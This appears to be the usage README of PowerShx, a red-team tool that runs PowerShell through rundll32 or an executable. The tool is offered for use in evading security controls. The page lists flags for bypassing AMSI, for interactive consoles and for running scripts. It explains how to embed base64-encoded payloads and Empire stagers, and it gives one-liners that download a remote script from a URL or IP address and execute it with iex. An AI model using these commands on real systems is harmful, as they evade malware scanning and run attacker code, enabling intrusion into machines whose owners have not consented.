PowerShx is a rewrite and expansion on the PowerShdll project. PowerShx provide functionalities for bypassing AMSI and running PS Cmdlets.
rundll32 PowerShx.dll,main -e
rundll32 PowerShx.dll,main -f Run the script passed as argument
rundll32 PowerShx.dll,main -f -c Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w Start an interactive console in a new window
rundll32 PowerShx.dll,main -i Start an interactive console
rundll32 PowerShx.dll,main -s Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v Print Execution Output to the console
Alternatives (Credit to SubTee for these techniques):
.exe version
PowerShx.exe -i Start an interactive console
PowerShx.exe -e
PowerShx.exe -f Run the script passed as argument
PowerShx.exe -f -c Load a script and run a PS cmdlet
PowerShx.exe -s Attempt to bypass AMSI.
Embedded Payloads
Payloads can be embedded by updating the data dictionary “Common.Payloads.PayloadDict” in the “Common” project and calling it in the method PsSession.cs -> Handle() . Example: in Handle() method:
private void Handle(Options options)
// Pre-execution before user script
rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(“BASE64”)) ^| iex
PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(“BASE64”)) ^| iex
Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode
rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;
PowerShx.exe -e “IEX ((new-object net.webclient).downloadstring(‘http://192.168.100/payload-http’))”
.NET 4
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